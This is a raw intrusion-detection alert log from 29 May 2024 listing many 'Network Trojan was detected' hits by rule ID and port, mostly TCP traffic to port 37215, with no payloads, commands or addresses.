                Timestamp:05/29/24-15:16:28.026610
                SID:2835222
                Source Port:34198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809298
                SID:2835222
                Source Port:40854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.666934
                SID:2829579
                Source Port:55614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871585
                SID:2835222
                Source Port:49624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.824019
                SID:2829579
                Source Port:53366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.651536
                SID:2835222
                Source Port:52088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225499
                SID:2835222
                Source Port:51058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779286
                SID:2829579
                Source Port:46694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610247
                SID:2835222
                Source Port:48034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975925
                SID:2835222
                Source Port:37250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.327982
                SID:2829579
                Source Port:42480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945701
                SID:2835222
                Source Port:58614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.732314
                SID:2829579
                Source Port:48776
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.062062
                SID:2829579
                Source Port:60108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179656
                SID:2829579
                Source Port:35702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.937238
                SID:2829579
                Source Port:43690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.866032
                SID:2829579
                Source Port:58488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262671
                SID:2835222
                Source Port:60790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817010
                SID:2835222
                Source Port:41806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.261516
                SID:2835222
                Source Port:33714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.521813
                SID:2829579
                Source Port:37104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526917
                SID:2829579
                Source Port:58080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830680
                SID:2835222
                Source Port:57050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972212
                SID:2835222
                Source Port:43254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.498469
                SID:2829579
                Source Port:40294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782225
                SID:2829579
                Source Port:53364
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.280408
                SID:2829579
                Source Port:53610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.762878
                SID:2829579
                Source Port:38344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784571
                SID:2829579
                Source Port:54620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687994
                SID:2835222
                Source Port:56890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.047090
                SID:2835222
                Source Port:39232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.172961
                SID:2835222
                Source Port:47432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667410
                SID:2835222
                Source Port:48286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333689
                SID:2835222
                Source Port:53280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.042976
                SID:2835222
                Source Port:58150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.816977
                SID:2835222
                Source Port:43392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983900
                SID:2829579
                Source Port:52762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763659
                SID:2835222
                Source Port:60698
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653364
                SID:2829579
                Source Port:43150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397311
                SID:2829579
                Source Port:33326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.936374
                SID:2829579
                Source Port:51148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668550
                SID:2835222
                Source Port:55386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265671
                SID:2835222
                Source Port:34546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227642
                SID:2829579
                Source Port:34468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915042
                SID:2835222
                Source Port:44036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783708
                SID:2829579
                Source Port:44078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859604
                SID:2829579
                Source Port:46868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.896091
                SID:2829579
                Source Port:37284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920998
                SID:2829579
                Source Port:58572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234047
                SID:2829579
                Source Port:50560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.957662
                SID:2835222
                Source Port:45102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809291
                SID:2835222
                Source Port:59904
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994595
                SID:2835222
                Source Port:39890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438724
                SID:2835222
                Source Port:55650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764200
                SID:2829579
                Source Port:38830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840308
                SID:2835222
                Source Port:60496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688269
                SID:2835222
                Source Port:38894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436737
                SID:2835222
                Source Port:36958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359602
                SID:2829579
                Source Port:52000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815915
                SID:2835222
                Source Port:49566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943909
                SID:2835222
                Source Port:44606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512345
                SID:2829579
                Source Port:57690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977682
                SID:2829579
                Source Port:47162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898428
                SID:2829579
                Source Port:51426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289043
                SID:2835222
                Source Port:48706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849041
                SID:2835222
                Source Port:58630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655220
                SID:2829579
                Source Port:59058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.070330
                SID:2835222
                Source Port:33746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436271
                SID:2835222
                Source Port:55946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.445594
                SID:2829579
                Source Port:60704
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:34.004756
                SID:2030490
                Source Port:45096
                Destination Port:1235
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.026472
                SID:2835222
                Source Port:49076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871799
                SID:2835222
                Source Port:60216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664132
                SID:2835222
                Source Port:37280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470225
                SID:2835222
                Source Port:33774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701066
                SID:2829579
                Source Port:44388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789264
                SID:2829579
                Source Port:53850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.915487
                SID:2829579
                Source Port:44036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262709
                SID:2835222
                Source Port:53578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908732
                SID:2835222
                Source Port:38782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779692
                SID:2829579
                Source Port:49106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.672642
                SID:2829579
                Source Port:58112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881720
                SID:2829579
                Source Port:33772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.225474
                SID:2835222
                Source Port:37184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.579989
                SID:2829579
                Source Port:45246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915478
                SID:2835222
                Source Port:43850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263743
                SID:2835222
                Source Port:38128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660492
                SID:2829579
                Source Port:53804
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.073884
                SID:2829579
                Source Port:56590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074613
                SID:2829579
                Source Port:60584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.231347
                SID:2829579
                Source Port:52002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140681
                SID:2829579
                Source Port:52910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532045
                SID:2835222
                Source Port:59874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.429490
                SID:2829579
                Source Port:41750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009732
                SID:2829579
                Source Port:45736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.531052
                SID:2835222
                Source Port:53442
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.718091
                SID:2829579
                Source Port:49896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.974227
                SID:2835222
                Source Port:43712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.617233
                SID:2829579
                Source Port:33308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653481
                SID:2835222
                Source Port:33474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947188
                SID:2829579
                Source Port:43588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.518045
                SID:2829579
                Source Port:37606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942680
                SID:2835222
                Source Port:57712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611159
                SID:2835222
                Source Port:47756
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.735297
                SID:2835222
                Source Port:37254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025267
                SID:2829579
                Source Port:41060
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.501561
                SID:2829579
                Source Port:54112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629793
                SID:2835222
                Source Port:52876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981970
                SID:2829579
                Source Port:52506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928548
                SID:2835222
                Source Port:58002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795375
                SID:2835222
                Source Port:40376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.981768
                SID:2835222
                Source Port:37870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508660
                SID:2829579
                Source Port:35330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528352
                SID:2835222
                Source Port:44928
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730399
                SID:2829579
                Source Port:51666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583549
                SID:2835222
                Source Port:45738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.830742
                SID:2835222
                Source Port:51496
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277593
                SID:2829579
                Source Port:48750
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521304
                SID:2835222
                Source Port:60720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333717
                SID:2829579
                Source Port:39396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.551290
                SID:2835222
                Source Port:54834
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324759
                SID:2835222
                Source Port:45998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.243033
                SID:2835222
                Source Port:43036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883879
                SID:2835222
                Source Port:47352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.764252
                SID:2829579
                Source Port:37308
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.718459
                SID:2835222
                Source Port:51396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.688935
                SID:2829579
                Source Port:46740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666544
                SID:2829579
                Source Port:60266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227146
                SID:2835222
                Source Port:47168
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840123
                SID:2829579
                Source Port:52362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773163
                SID:2829579
                Source Port:42114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.869253
                SID:2835222
                Source Port:56280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441442
                SID:2835222
                Source Port:40598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588777
                SID:2829579
                Source Port:34394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567076
                SID:2835222
                Source Port:38272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461282
                SID:2835222
                Source Port:59172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.920974
                SID:2835222
                Source Port:33868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.622053
                SID:2835222
                Source Port:59772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359220
                SID:2829579
                Source Port:49232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.914181
                SID:2835222
                Source Port:60170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.887654
                SID:2835222
                Source Port:45280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877278
                SID:2835222
                Source Port:34902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730268
                SID:2835222
                Source Port:55036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675343
                SID:2835222
                Source Port:57494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640539
                SID:2835222
                Source Port:46926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.783471
                SID:2835222
                Source Port:33164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263760
                SID:2835222
                Source Port:51098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586414
                SID:2829579
                Source Port:37508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163508
                SID:2835222
                Source Port:35678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979427
                SID:2829579
                Source Port:42184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420913
                SID:2829579
                Source Port:45468
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.934135
                SID:2835222
                Source Port:32982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072606
                SID:2835222
                Source Port:56884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.966589
                SID:2829579
                Source Port:44530
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.221439
                SID:2835222
                Source Port:54830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228059
                SID:2835222
                Source Port:56290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438204
                SID:2835222
                Source Port:47822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.776610
                SID:2835222
                Source Port:60330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618540
                SID:2835222
                Source Port:54124
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.737701
                SID:2835222
                Source Port:59986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032852
                SID:2829579
                Source Port:38212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025039
                SID:2835222
                Source Port:36024
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.338931
                SID:2829579
                Source Port:55486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766342
                SID:2829579
                Source Port:39754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266255
                SID:2829579
                Source Port:45472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209994
                SID:2829579
                Source Port:41292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931989
                SID:2829579
                Source Port:58030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.291993
                SID:2829579
                Source Port:58080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794051
                SID:2835222
                Source Port:47056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560156
                SID:2829579
                Source Port:56440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.969575
                SID:2835222
                Source Port:42808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.363396
                SID:2829579
                Source Port:49510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.639882
                SID:2835222
                Source Port:39426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.160974
                SID:2835222
                Source Port:54426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.810474
                SID:2835222
                Source Port:45232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.967630
                SID:2829579
                Source Port:43676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227823
                SID:2829579
                Source Port:45962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644622
                SID:2835222
                Source Port:52102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178862
                SID:2829579
                Source Port:48832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.727237
                SID:2829579
                Source Port:35280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586919
                SID:2829579
                Source Port:57172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.334706
                SID:2829579
                Source Port:59732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208069
                SID:2829579
                Source Port:53448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925783
                SID:2829579
                Source Port:38926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422104
                SID:2829579
                Source Port:50302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873100
                SID:2835222
                Source Port:40098
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.870451
                SID:2835222
                Source Port:34516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576058
                SID:2835222
                Source Port:50566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210071
                SID:2835222
                Source Port:48792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508968
                SID:2835222
                Source Port:36648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655895
                SID:2829579
                Source Port:48398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521434
                SID:2829579
                Source Port:44166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733055
                SID:2829579
                Source Port:53480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227334
                SID:2835222
                Source Port:40446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.693934
                SID:2835222
                Source Port:57678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261730
                SID:2829579
                Source Port:41574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.844055
                SID:2829579
                Source Port:48626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584240
